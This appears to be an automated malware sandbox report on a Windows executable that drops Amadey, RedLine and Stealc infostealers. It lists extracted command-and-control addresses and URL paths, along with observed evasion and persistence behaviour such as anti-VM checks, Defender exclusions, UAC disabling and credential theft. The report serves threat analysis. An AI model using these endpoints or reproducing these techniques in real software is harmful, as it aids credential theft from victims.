Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07/08/2024, 09:09
Static task
static1
Behavioral task
behavioral1
Sample
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Resource
win11-20240802-en
General
-
Target
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
-
Size
1.8MB
-
MD5
ee8904b675f96658c010ec91c94102c6
-
SHA1
1838a28a91645768f1b186ef05ad797dd29fda12
-
SHA256
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107
-
SHA512
1a6ec563191939662fafd46a976c694a6881c402d2c8c1103e50dfa093f6c40cb136cd0578b5a7b355c62efe50603bbe4128e801f5566451353a31ca25bde336
-
SSDEEP
49152:VDaanUYEobclzT0wAAS5JKtLQpXbfMoAOeTmBxa10:hUYEOQzkAEYLeXL+OegM0
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
20.52.165.210:39030
Extracted
redline
185.215.113.67:21405
Extracted
stealc
default
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
redline
BUY TG @FATHEROFCARDERS
45.66.231.214:9932
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral1/memory/1608-37-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/files/0x0007000000023447-118.dat family_redline behavioral1/memory/224-135-0x00000000006F0000-0x0000000000742000-memory.dmp family_redline behavioral1/files/0x000700000002345d-225.dat family_redline behavioral1/memory/1088-244-0x0000000000620000-0x0000000000672000-memory.dmp family_redline -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" FILE2233.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe = "0" FILE2233.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths FILE2233.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 134 2688 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2536 powershell.exe 1376 powershell.exe 5096 powershell.exe 4572 powershell.exe 2368 powershell.exe 396 powershell.EXE 3288 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation FILE2233.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation bgsBSgx.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation newalp.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gUSDl3gFR83MICUnZ0QPm612.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kn3CwXOIRYfGgWQJitEUNkdW.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69Jqvs3qHY3qjnfDKnWu7Z7E.bat AddInProcess32.exe -
Executes dropped EXE 21 IoCs
pid Process 4764 axplong.exe 3548 GOLD.exe 4684 crypteda.exe 3060 newalp.exe 1296 Hkbsse.exe 5004 oBQMEm0i5e.exe 4476 xFQnh8cWxU.exe 224 06082025.exe 1272 stealc_default.exe 4068 FILE2233.exe 1088 MYNEWRDX.exe 2248 FXPIXmmOlcOfR4xFLhyvdYQ1.exe 5000 Install.exe 2104 xJAM4MsezZDtYmybnRQtNEFI.exe 1032 Install.exe 4124 axplong.exe 1288 Install.exe 1084 Hkbsse.exe 4232 bgsBSgx.exe 992 Hkbsse.exe 3340 axplong.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Wine 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Wine axplong.exe -
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2668 forfiles.exe 2560 forfiles.exe 1060 forfiles.exe 2312 forfiles.exe 4588 forfiles.exe 4448 forfiles.exe 1364 forfiles.exe 3424 forfiles.exe 3008 forfiles.exe 2348 forfiles.exe 3204 forfiles.exe 3020 forfiles.exe 4588 forfiles.exe 3732 forfiles.exe 5036 forfiles.exe 4840 forfiles.exe 4440 forfiles.exe -
Loads dropped DLL 3 IoCs
pid Process 1272 stealc_default.exe 1272 stealc_default.exe 2688 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions FILE2233.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe = "0" FILE2233.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths FILE2233.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FILE2233.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" FILE2233.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json bgsBSgx.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json bgsBSgx.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 59 raw.githubusercontent.com 36 raw.githubusercontent.com 37 raw.githubusercontent.com 49 pastebin.com 51 pastebin.com -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA bgsBSgx.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bgsBSgx.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 bgsBSgx.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA bgsBSgx.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C bgsBSgx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 bgsBSgx.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 752 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 4764 axplong.exe 4124 axplong.exe 3340 axplong.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3548 set thread context of 1608 3548 GOLD.exe 89 PID 4684 set thread context of 2112 4684 crypteda.exe 97 PID 4068 set thread context of 732 4068 FILE2233.exe 112 -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\OKRdpmURQpaU2\XfCirUbClOJJH.dll bgsBSgx.exe File created C:\Program Files (x86)\OKRdpmURQpaU2\eIIoden.xml bgsBSgx.exe File created C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\VCuCnEi.dll bgsBSgx.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak bgsBSgx.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi bgsBSgx.exe File created C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\IdlLGKX.xml bgsBSgx.exe File created C:\Program Files (x86)\smKXxMfqpieUC\MecCURX.xml bgsBSgx.exe File created C:\Program Files (x86)\ZTBxIWbqU\fiUCOJ.dll bgsBSgx.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja bgsBSgx.exe File created C:\Program Files (x86)\ZTBxIWbqU\jtAKeYO.xml bgsBSgx.exe File created C:\Program Files (x86)\smKXxMfqpieUC\wLfGvNk.dll bgsBSgx.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi bgsBSgx.exe File created C:\Program Files (x86)\aMBHFSbSyrUn\cEcRagJ.dll bgsBSgx.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak bgsBSgx.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Tasks\voUEtHYOOZwJsxqeG.job schtasks.exe File created C:\Windows\Tasks\yFAmEcnxfnVDyRq.job schtasks.exe File created C:\Windows\Tasks\RNbHXMWSUrQEjcGVS.job schtasks.exe File created C:\Windows\Tasks\axplong.job 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe File created C:\Windows\Tasks\Hkbsse.job newalp.exe File created C:\Windows\Tasks\bdLMAcyiuofwZlrejw.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4280 1288 WerFault.exe 151 2136 1032 WerFault.exe 120 2120 4232 WerFault.exe 245 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06082025.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MYNEWRDX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oBQMEm0i5e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xFQnh8cWxU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bgsBSgx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 xJAM4MsezZDtYmybnRQtNEFI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString xJAM4MsezZDtYmybnRQtNEFI.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bgsBSgx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bgsBSgx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix bgsBSgx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f1c9ec80-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key 